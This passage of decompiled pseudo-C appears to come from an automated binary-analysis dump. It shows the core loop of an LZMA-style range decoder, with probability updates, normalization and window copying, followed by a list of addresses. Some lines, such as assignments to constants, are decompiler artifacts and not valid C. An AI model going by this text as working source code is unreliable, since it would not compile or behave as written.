												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                0x00000000
                                                                0x00406591
                                                                0x00406591
                                                                0x00406595
                                                                0x004065a2
